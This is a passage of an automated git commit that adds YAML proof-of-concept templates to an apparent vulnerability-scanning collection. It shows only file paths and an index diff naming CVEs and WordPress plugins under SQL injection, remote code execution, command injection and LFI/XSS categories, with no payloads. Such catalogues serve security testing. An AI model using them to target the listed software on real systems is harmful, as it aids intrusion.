From 89d61877c8974ec923985f0d8d224c8d4f349d0e Mon Sep 17 00:00:00 2001 
From: GitHub Action
Date: Tue, 26 Nov 2024 12:43:37 +0000
Subject: [PATCH] 20241126
---
 date.txt | 2 +-
 poc.txt | 122 +++++
 ...ager-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 ...ckup-889122f13f92f4a43160426c13aa8df0.yaml | 59 ++
 poc/cve/CVE-2011-1669-2046.yaml | 31 ++
 poc/cve/CVE-2011-4624-2075.yaml | 29 +
 poc/cve/CVE-2013-3526-2254.yaml | 30 ++
 poc/cve/CVE-2013-4625-2269.yaml | 30 ++
 poc/cve/CVE-2014-4535-2349.yaml | 32 ++
 poc/cve/CVE-2014-4592-2380.yaml | 37 ++
 poc/cve/CVE-2014-5368-2398.yaml | 30 ++
 poc/cve/CVE-2014-9094-2416.yaml | 29 +
 poc/cve/CVE-2015-9480-2629.yaml | 33 ++
 poc/cve/CVE-2016-1000130-2660.yaml | 35 ++
 poc/cve/CVE-2016-1000136-2686.yaml | 38 ++
 poc/cve/CVE-2017-1000170-2838.yaml | 35 ++
 poc/cve/CVE-2019-10692(1).yaml | 57 ++
 poc/cve/CVE-2019-15713-3886.yaml | 32 ++
 poc/cve/CVE-2020-24312-4805.yaml | 24 +
 poc/cve/CVE-2020-24312-4806.yaml | 37 ++
 poc/cve/CVE-2020-35951-5106.yaml | 67 +++
 poc/cve/CVE-2021-24495-5749.yaml | 40 ++
 poc/cve/CVE-2021-24838-5768.yaml | 32 ++
 poc/cve/CVE-2021-24947-5775.yaml | 41 ++
 poc/cve/CVE-2021-24991-5779.yaml | 51 ++
 poc/cve/CVE-2021-25074-5799.yaml | 28 +
 poc/cve/CVE-2021-39322-6337.yaml | 52 ++
 poc/cve/CVE-2021-39350-6343.yaml | 54 ++
 poc/cve/CVE-2022-0271-6617.yaml | 37 ++
 poc/cve/CVE-2022-0288(1).yaml | 60 +++
 ...2299-dc65b04d2202ad9c581e5d4523d9377b.yaml | 59 ++
 ...2414-9f0d12c35523ff4f5d135545493c24b6.yaml | 59 ++
 ...7297-a95d63f970ebd421a8709918222db375.yaml | 59 ++
 ...0113-5e3997da307eb6c6a9470bf105039eed.yaml | 59 ++
 ...0308-e95e71d9b22aad1a339e647728650987.yaml | 59 ++
 ...0542-9cd3734bb0202544680880ac3ce86ba2.yaml | 59 ++
 ...0570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml | 59 ++
 ...0579-3b42e924fd20aca47fa65689d369e300.yaml | 59 ++
 ...0632-ce98811461e8d024a9032e659d9f6dc9.yaml | 59 ++
 ...0634-1cfffc62bc3024e3b58ab7adce57d49d.yaml | 59 ++
 ...0677-17d70666036f25fcf74aa1320bac4cf3.yaml | 59 ++
 ...0729-176c3f5bae8556ce3b12e234c357e170.yaml | 59 ++
 ...0781-3c798af34f43aabb0c7903d65e6243ce.yaml | 59 ++
...0813-148804687e2659312d74d49090ab4b03.yaml | 59 ++
 ...0857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml | 59 ++
 ...0868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml | 59 ++
 ...1002-bb89910755dac308dc83c1e533f25239.yaml | 59 ++
 ...1024-47f8599da025c3dd9d60a7fed198eb3e.yaml | 59 ++
 ...1032-4ea7351ae274d6588df316b48df1d0e7.yaml | 59 ++
 ...1091-f4e3a11a24e59ca5d94c2f2172581867.yaml | 59 ++
 ...1119-91fb399971cf3dbe2eb559f4abe09be9.yaml | 59 ++
 ...1192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml | 59 ++
 ...1202-32578cc7038a4c251703cadebc084ad8.yaml | 59 ++
 ...1202-52e2ce4340581c57296ec17159d2460d.yaml | 59 ++
 ...1202-77caff140b8bc5be998ac80c9386051c.yaml | 59 ++
 ...1202-7e66c6243adb4eea85c26f32e6f8ebab.yaml | 59 ++
 ...1202-a3d50569bc623538b3b216d3f9a91b14.yaml | 59 ++
 ...1202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml | 59 ++
 ...1202-fff8c296c72f5db38be0e5405c2da320.yaml | 59 ++
 ...1225-d04b85edb3b4b1503b77188d5240c512.yaml | 59 ++
 ...1342-e05ffc71141aa17d097258d0a66a00da.yaml | 59 ++
 ...1416-5d401293d5cdabfd1d6c6643186015bc.yaml | 59 ++
 ...1418-fabf33e92d70128a9b53e9bacfb521c3.yaml | 59 ++
 ...2137-9ccea012e0ac1d68360d1db53ebe0f41.yaml | 59 ++
 ...8724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml | 59 ++
 ...7638-e7353821f2fc91f455eddee79fe76776.yaml | 59 ++
 ...7639-19456cd5cae51d9dbada09d8ad8ba38f.yaml | 59 ++
 ...2377-892589d65d97802ea2d1e85ee0198106.yaml | 59 ++
 ...8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml | 59 ++
 ...8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml | 59 ++
 ...9170-852e94b07d2d6cce1f47615e01c1a162.yaml | 59 ++
 ...9307-99143edb3a824cd072b593997866abef.yaml | 59 ++
 ...9461-4ff08177d4fa4134967742398a5fe2e9.yaml | 59 ++
 ...9504-029455c801fdee249681893f5eb0c87b.yaml | 59 ++
 ...9614-0ef94d7a238d24553757f1a16696672d.yaml | 59 ++
 ...9988-287bf623a719e14be52f61193b77398b.yaml | 59 ++
 poc/debug/aspx-debug-mode.yaml | 10 +-
 ...ader-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 poc/injection/Command Injection.yaml | 55 ++
 .../geowebserver-lfi-xss.yaml | 50 ++
...sser-05523ca99a6812ce9a8ee1b96d42e704.yaml | 59 ++
 ...ewer-401534e15701284d7d10ed528a79ca69.yaml | 59 ++
 ...ndar-b3cd350c4619e9b5bfb265fa7add2acb.yaml | 59 ++
 ...tect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml | 59 ++
 ...ntor-2c0ba7008797c295f2668278862f26f2.yaml | 59 ++
 ...lery-2919c831aa5a75589b7d8a36cf988930.yaml | 59 ++
 ...-kit-65f8ab2de6de83568fad8650a9c6403f.yaml | 59 ++
 ...-kit-8661863ce6f4b8a6d1c36b185972e474.yaml | 59 ++
 ...wall-7797f9e03c89bedae049ae2c17c746f0.yaml | 59 ++
 ...tcha-f122a6109fde182691f204ad9efb3807.yaml | 59 ++
 ...-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml | 59 ++
 ...erce-871d7de019dc16d9e0194a95c1418987.yaml | 59 ++
 ...erce-c39fb77f63e19b35a67746752819632d.yaml | 59 ++
 ...king-4e73e0f016338be497c921cd08f860d0.yaml | 59 ++
 ...pack-df377aa55171c3c6046688a216c80943.yaml | 59 ++
 ...lace-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 ...osts-8f2dbde369351cc27693796adbcd9a58.yaml | 59 ++
 ...7297-a95d63f970ebd421a8709918222db375.yaml | 59 ++
 ...0570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml | 59 ++
 ...1119-91fb399971cf3dbe2eb559f4abe09be9.yaml | 59 ++
 ...1202-7e66c6243adb4eea85c26f32e6f8ebab.yaml | 59 ++
 ...1202-fff8c296c72f5db38be0e5405c2da320.yaml | 59 ++
 ...1225-d04b85edb3b4b1503b77188d5240c512.yaml | 59 ++
 ...2137-9ccea012e0ac1d68360d1db53ebe0f41.yaml | 59 ++
 ...7639-19456cd5cae51d9dbada09d8ad8ba38f.yaml | 59 ++
 ...9307-99143edb3a824cd072b593997866abef.yaml | 59 ++
 ...nded-3622d51c6b74dbf4cdd79a233382f3ca.yaml | 59 ++
 ...tect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml | 59 ++
 ...tory-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 ...list-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 ...ader-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 ...lace-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 ...ners-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 ...ager-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 ...sary-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++
 poc/sql/error-sqli.yaml | 508 ++++++++++++++++++
 ...-box-0f3bd1dbea65ea23a33e64d82488e169.yaml | 59 ++
...-box-d698070b224b4726dbc297056bea4cbe.yaml | 59 ++
 ...osts-8f2dbde369351cc27693796adbcd9a58.yaml | 59 ++
 poc/sql_injection/error-sqli.yaml | 508 ++++++++++++++++++
 poc/web/geowebserver-lfi-xss.yaml | 50 ++
 ...ress-6157ddc840ff3aaacb724f29e67883ff.yaml | 59 ++
 ...opup-be069733ca362578f99c68a45b934c7d.yaml | 59 ++
 ...date-7b898c57c30032aff3f3e6faaf604680.yaml | 59 ++
 poc/xss/geowebserver-lfi-xss.yaml | 50 ++
 125 files changed, 7663 insertions(+), 3 deletions(-)
 create mode 100644 poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml
 create mode 100644 poc/cve/CVE-2011-1669-2046.yaml
 create mode 100644 poc/cve/CVE-2011-4624-2075.yaml
 create mode 100644 poc/cve/CVE-2013-3526-2254.yaml
 create mode 100644 poc/cve/CVE-2013-4625-2269.yaml
 create mode 100644 poc/cve/CVE-2014-4535-2349.yaml
 create mode 100644 poc/cve/CVE-2014-4592-2380.yaml
 create mode 100644 poc/cve/CVE-2014-5368-2398.yaml
 create mode 100644 poc/cve/CVE-2014-9094-2416.yaml
 create mode 100644 poc/cve/CVE-2015-9480-2629.yaml
 create mode 100644 poc/cve/CVE-2016-1000130-2660.yaml
 create mode 100644 poc/cve/CVE-2016-1000136-2686.yaml
 create mode 100644 poc/cve/CVE-2017-1000170-2838.yaml
 create mode 100644 poc/cve/CVE-2019-10692(1).yaml
 create mode 100644 poc/cve/CVE-2019-15713-3886.yaml
 create mode 100644 poc/cve/CVE-2020-24312-4805.yaml
 create mode 100644 poc/cve/CVE-2020-24312-4806.yaml
 create mode 100644 poc/cve/CVE-2020-35951-5106.yaml
 create mode 100644 poc/cve/CVE-2021-24495-5749.yaml
 create mode 100644 poc/cve/CVE-2021-24838-5768.yaml
 create mode 100644 poc/cve/CVE-2021-24947-5775.yaml
 create mode 100644 poc/cve/CVE-2021-24991-5779.yaml
 create mode 100644 poc/cve/CVE-2021-25074-5799.yaml
 create mode 100644 poc/cve/CVE-2021-39322-6337.yaml
 create mode 100644 poc/cve/CVE-2021-39350-6343.yaml
 create mode 100644 poc/cve/CVE-2022-0271-6617.yaml
 create mode 100644 poc/cve/CVE-2022-0288(1).yaml
 create mode 100644 poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml
 create mode 100644 poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml
 create mode 100644 poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml
 create mode 100644 poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml
 create mode 100644 poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml
 create mode 100644 poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml
 create mode 100644 poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml
 create mode 100644 poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml
 create mode 100644 poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml
 create mode 100644 poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml
 create mode 100644 poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml
 create mode 100644 poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml
 create mode 100644 poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml
 create mode 100644 poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml
 create mode 100644 poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml
 create mode 100644 poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml
 create mode 100644 poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml
 create mode 100644 poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml
 create mode 100644 poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml
 create mode 100644 poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml
 create mode 100644 poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
 create mode 100644 poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml
 create mode 100644 poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml
 create mode 100644 poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml
 create mode 100644 poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml
 create mode 100644 poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml
 create mode 100644 poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml
 create mode 100644 poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml
 create mode 100644 poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml
 create mode 100644 poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml
 create mode 100644 poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml
 create mode 100644 poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml
 create mode 100644 poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml
 create mode 100644 poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml
 create mode 100644 poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml
 create mode 100644 poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml
 create mode 100644 poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml
 create mode 100644 poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml
 create mode 100644 poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml
 create mode 100644 poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml
 create mode 100644 poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml
 create mode 100644 poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml
 create mode 100644 poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml
 create mode 100644 poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml
 create mode 100644 poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml
 create mode 100644 poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml
 create mode 100644 poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/injection/Command Injection.yaml
 create mode 100644 poc/local_file_inclusion/geowebserver-lfi-xss.yaml
 create mode 100644 poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml
 create mode 100644 poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml
 create mode 100644 poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml
 create mode 100644 poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml
 create mode 100644 poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml
 create mode 100644 poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml
 create mode 100644 poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml
 create mode 100644 poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml
 create mode 100644 poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml
 create mode 100644 poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml
 create mode 100644 poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml
 create mode 100644 poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml
 create mode 100644 poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml
 create mode 100644 poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml
 create mode 100644 poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml
 create mode 100644 poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml
 create mode 100644 poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml
 create mode 100644 poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml
 create mode 100644 poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
 create mode 100644 poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml
 create mode 100644 poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml
 create mode 100644 poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml
 create mode 100644 poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml
 create mode 100644 poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml
 create mode 100644 poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml
 create mode 100644 poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml
 create mode 100644 poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml
 create mode 100644 poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml
 create mode 100644 poc/sql/error-sqli.yaml
 create mode 100644 poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml
 create mode 100644 poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml
 create mode 100644 poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml
 create mode 100644 poc/sql_injection/error-sqli.yaml
 create mode 100644 poc/web/geowebserver-lfi-xss.yaml
 create mode 100644 poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml
 create mode 100644 poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml
 create mode 100644 poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml
 create mode 100644 poc/xss/geowebserver-lfi-xss.yaml
diff --git a/date.txt b/date.txt
index 19047096d8..866e998b5b 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241125
+20241126
diff --git a/poc.txt b/poc.txt
index 5bb1b30042..867624d13f 100644
--- a/poc.txt
+++ b/poc.txt
@@ -2484,6 +2484,7 @@
 ./poc/auth/cloudinary-credentials.yaml
 ./poc/auth/cloudpanel-login.yaml
 ./poc/auth/cloudstack-default-login.yaml
+./poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml
 ./poc/auth/cm-video-lesson-manager-adc03f41b1a0fc94bb66a5f89513eead.yaml
 ./poc/auth/cm-video-lesson-manager-pro-adc03f41b1a0fc94bb66a5f89513eead.yaml
 ./poc/auth/cm-video-lesson-manager-pro.yaml
@@ -6814,6 +6815,7 @@
 ./poc/backup/blogvault-real-time-backup-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/backup/blogvault-real-time-backup-plugin.yaml
 ./poc/backup/blogvault-real-time-backup.yaml
+./poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml
 ./poc/backup/boldgrid-backup-af02285370806db39f139e5eeb2109cf.yaml
 ./poc/backup/boldgrid-backup-f80b64f3e7a1b521248cad7f30f78f43.yaml
 ./poc/backup/boldgrid-backup.yaml
@@ -8831,6 +8833,7 @@
 ./poc/cve/CVE-2011-1047-d96be18375773588f0f483d4ada57922.yaml
 ./poc/cve/CVE-2011-1047.yaml
 ./poc/cve/CVE-2011-1669-2044.yaml
+./poc/cve/CVE-2011-1669-2046.yaml
 ./poc/cve/CVE-2011-1669-a55226715cbfa8fc4e25477ef2abaef0.yaml
 ./poc/cve/CVE-2011-1669.yaml
 ./poc/cve/CVE-2011-1762-b98fb14bc0b549d4abcc53b29b712fd3.yaml
@@ -8905,6 +8908,7 @@
 ./poc/cve/CVE-2011-4595.yaml
 ./poc/cve/CVE-2011-4618-391f474e06835c68dec4fb58e933aba3.yaml
 ./poc/cve/CVE-2011-4618.yaml
+./poc/cve/CVE-2011-4624-2075.yaml
 ./poc/cve/CVE-2011-4624-deb27e459bccc6c567e77bedadf302ef.yaml
 ./poc/cve/CVE-2011-4624.yaml
 ./poc/cve/CVE-2011-4640.yaml
@@ -9492,6 +9496,7 @@
 ./poc/cve/CVE-2013-3491-0c168f79b44c00adde765867b84cd13b.yaml
 ./poc/cve/CVE-2013-3491.yaml
 ./poc/cve/CVE-2013-3526-2250.yaml
+./poc/cve/CVE-2013-3526-2254.yaml
 ./poc/cve/CVE-2013-3526-2255.yaml
 ./poc/cve/CVE-2013-3526-a266c3247c63a001c07720468657c7b0.yaml
 ./poc/cve/CVE-2013-3526.yaml
@@ -9532,6 +9537,7 @@
 ./poc/cve/CVE-2013-4454.yaml
 ./poc/cve/CVE-2013-4462-16944fdd8879fb55f44fca776684e221.yaml
 ./poc/cve/CVE-2013-4462.yaml
+./poc/cve/CVE-2013-4625-2269.yaml
 ./poc/cve/CVE-2013-4625-2271.yaml
 ./poc/cve/CVE-2013-4625-c8066fe352a3efc9f6d6df879bae901c.yaml
 ./poc/cve/CVE-2013-4625.yaml
@@ -9915,6 +9921,7 @@
 ./poc/cve/CVE-2014-4534-bf7fdb7ab58e0901f00e8d60dcb2e1d4.yaml
 ./poc/cve/CVE-2014-4534.yaml
 ./poc/cve/CVE-2014-4535-2347.yaml
+./poc/cve/CVE-2014-4535-2349.yaml
 ./poc/cve/CVE-2014-4535-3d01778e50ed2091df8f42d1d6714632.yaml
 ./poc/cve/CVE-2014-4535.yaml
 ./poc/cve/CVE-2014-4536-2350.yaml
@@ -10037,6 +10044,7 @@
 ./poc/cve/CVE-2014-4591-2f915f477d37b349867bc04aeb12d553.yaml
 ./poc/cve/CVE-2014-4591.yaml
 ./poc/cve/CVE-2014-4592-2376.yaml
+./poc/cve/CVE-2014-4592-2380.yaml
 ./poc/cve/CVE-2014-4592-63d6be807d589fe05a43c1a154984e97.yaml
 ./poc/cve/CVE-2014-4592.yaml
 ./poc/cve/CVE-2014-4593-523766ae916645b68a060d3e8a3d2540.yaml
@@ -10180,6 +10188,7 @@
 ./poc/cve/CVE-2014-5347-13a438ed5cf2f34b9897196a8c29f2f9.yaml
 ./poc/cve/CVE-2014-5347.yaml
 ./poc/cve/CVE-2014-5368-2397.yaml
+./poc/cve/CVE-2014-5368-2398.yaml
 ./poc/cve/CVE-2014-5368-93bf6dbe410010e503c60f7e20f4acea.yaml
 ./poc/cve/CVE-2014-5368.yaml
 ./poc/cve/CVE-2014-5389-88780eb9a8b6e52598bcc4ed44a164c3.yaml
@@ -10353,6 +10362,7 @@
 ./poc/cve/CVE-2014-9038.yaml
 ./poc/cve/CVE-2014-9039-e36ead55dcc8029f1208afc5fd967940.yaml
 ./poc/cve/CVE-2014-9039.yaml
+./poc/cve/CVE-2014-9094-2416.yaml
 ./poc/cve/CVE-2014-9094-2420.yaml
 ./poc/cve/CVE-2014-9094-33981699600bd7688fa76839ea64eb69.yaml
 ./poc/cve/CVE-2014-9094.yaml
@@ -11412,6 +11422,7 @@
 ./poc/cve/CVE-2015-9477.yaml
 ./poc/cve/CVE-2015-9479-610c1b0820a34b426f46a24294b86cf7.yaml
 ./poc/cve/CVE-2015-9479.yaml
+./poc/cve/CVE-2015-9480-2629.yaml
 ./poc/cve/CVE-2015-9480-2630.yaml
 ./poc/cve/CVE-2015-9480-2632.yaml
 ./poc/cve/CVE-2015-9480-2633.yaml
@@ -11563,6 +11574,7 @@
 ./poc/cve/CVE-2016-1000129-b5d1789ed0ade3c2f34db64ead649719.yaml
 ./poc/cve/CVE-2016-1000129.yaml
 ./poc/cve/CVE-2016-1000130-2659.yaml
+./poc/cve/CVE-2016-1000130-2660.yaml
 ./poc/cve/CVE-2016-1000130-d953a1566c86af7c691d8c877f8e9d37.yaml
 ./poc/cve/CVE-2016-1000130.yaml
 ./poc/cve/CVE-2016-1000131-2661.yaml
@@ -11582,6 +11594,7 @@
 ./poc/cve/CVE-2016-1000135-2685.yaml
 ./poc/cve/CVE-2016-1000135-953ff551adbc4893b237af8ca2f3090a.yaml
 ./poc/cve/CVE-2016-1000135.yaml
+./poc/cve/CVE-2016-1000136-2686.yaml
 ./poc/cve/CVE-2016-1000136-743a0575c2e9f5674d434b647e0829cf.yaml
 ./poc/cve/CVE-2016-1000136.yaml
 ./poc/cve/CVE-2016-1000137-2690.yaml
@@ -12062,6 +12075,7 @@
 ./poc/cve/CVE-2017-1000038-bf988e0d814700ec44f119b226466a0c.yaml
 ./poc/cve/CVE-2017-1000038.yaml
 ./poc/cve/CVE-2017-1000163.yaml
+./poc/cve/CVE-2017-1000170-2838.yaml
 ./poc/cve/CVE-2017-1000170-2840.yaml
 ./poc/cve/CVE-2017-1000170-2f1afbe99f3a4b3fbcd2086e71fd1ce6.yaml
 ./poc/cve/CVE-2017-1000170-8184254cd86a1fe25bafab70f7a81e9d.yaml
@@ -13737,6 +13751,7 @@
 ./poc/cve/CVE-2019-10475.yaml
 ./poc/cve/CVE-2019-10673-2ea518f353dd95f0f661c47162793419.yaml
 ./poc/cve/CVE-2019-10673.yaml
+./poc/cve/CVE-2019-10692(1).yaml
 ./poc/cve/CVE-2019-10692-bc8f794cdcc46e9ceffda0a7252e56e7.yaml
 ./poc/cve/CVE-2019-10692.yaml
 ./poc/cve/CVE-2019-10717.yaml
@@ -14060,6 +14075,7 @@
 ./poc/cve/CVE-2019-15660-788c94bddb7d067a26cd25572d441b43.yaml
 ./poc/cve/CVE-2019-15660.yaml
 ./poc/cve/CVE-2019-15713-3884.yaml
+./poc/cve/CVE-2019-15713-3886.yaml
 ./poc/cve/CVE-2019-15713-3887.yaml
 ./poc/cve/CVE-2019-15713-681f882789fbd8efc46c58acadc76ffa.yaml
 ./poc/cve/CVE-2019-15713.yaml
@@ -15145,6 +15161,8 @@
 ./poc/cve/CVE-2020-24223 2.yaml
 ./poc/cve/CVE-2020-24223.yaml
 ./poc/cve/CVE-2020-24312 2.yaml
+./poc/cve/CVE-2020-24312-4805.yaml
+./poc/cve/CVE-2020-24312-4806.yaml
 ./poc/cve/CVE-2020-24312-694d378ae813237a53116c0909956f7b.yaml
 ./poc/cve/CVE-2020-24312.yaml
 ./poc/cve/CVE-2020-24313-48b0049e9e24d640a7ebc6488377fcfd.yaml
@@ -15397,6 +15415,7 @@
 ./poc/cve/CVE-2020-35949.yaml
 ./poc/cve/CVE-2020-35950-7bb0d7c21500bcf5a194c658d80a052e.yaml
 ./poc/cve/CVE-2020-35950.yaml
+./poc/cve/CVE-2020-35951-5106.yaml
 ./poc/cve/CVE-2020-35951-725c3bbeb5f948e2eae27fab9455cfc4.yaml
 ./poc/cve/CVE-2020-35951.yaml
 ./poc/cve/CVE-2020-35984.yaml
@@ -16805,6 +16824,7 @@
 ./poc/cve/CVE-2021-24495-1.yaml
 ./poc/cve/CVE-2021-24495-2.yaml
 ./poc/cve/CVE-2021-24495-5748.yaml
+./poc/cve/CVE-2021-24495-5749.yaml
 ./poc/cve/CVE-2021-24495-f9cf0d0ce26a12b4d4e222f02f196b48.yaml
 ./poc/cve/CVE-2021-24495.yaml
 ./poc/cve/CVE-2021-24496-1e49e561c1334988a3c1e2d22a931336.yaml
@@ -17491,6 +17511,7 @@
 ./poc/cve/CVE-2021-24837-856b5478246812988fad7c31a72f34f6.yaml
 ./poc/cve/CVE-2021-24837.yaml
 ./poc/cve/CVE-2021-24838-193631008f48769f14ce31f773b10581.yaml
+./poc/cve/CVE-2021-24838-5768.yaml
 ./poc/cve/CVE-2021-24838.yaml
 ./poc/cve/CVE-2021-24839-b54cf1fedbcdd93956474a85392276cb.yaml
 ./poc/cve/CVE-2021-24839.yaml
@@ -17704,6 +17725,7 @@
 ./poc/cve/CVE-2021-24945.yaml
 ./poc/cve/CVE-2021-24946-fc7a22b1f1e6a64f9cbfb21dc5918e58.yaml
